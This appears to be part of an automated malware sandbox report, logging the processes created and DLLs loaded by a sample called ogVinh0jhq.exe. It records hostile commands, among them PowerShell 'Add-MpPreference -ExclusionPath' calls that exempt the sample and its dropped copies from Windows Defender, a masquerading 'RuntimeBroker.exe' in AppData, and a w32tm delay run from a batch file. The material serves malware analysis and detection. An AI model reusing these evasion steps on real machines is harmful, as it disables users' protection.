Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe "C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\ITlIQtTGhEyfMRHaLp.exe"
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\RuntimeBroker.exe'	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ogVinh0jhq.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/user/AppData/Local/Microsoft/Windows/Explorer\ITlIQtTGhEyfMRHaLp.exe'
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TJHXkWh8sx.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\Desktop\ogVinh0jhq.exe "C:\Users\user\Desktop\ogVinh0jhq.exe"

Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: twext.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cscui.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: workfoldersshell.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: shacct.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: idstore.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wlidprov.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: provsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: starttiledata.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: usermgrproxy.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: acppage.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: aepic.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mmdevapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ksuser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: avrt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: audioses.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: midimap.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: version.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wldp.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: profapi.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: amsi.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: userenv.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: propsys.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: edputil.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: netutils.dll
Source: C:\Users\user\Desktop\ogVinh0jhq.exe	Section loaded: windows.staterepositoryps.dll
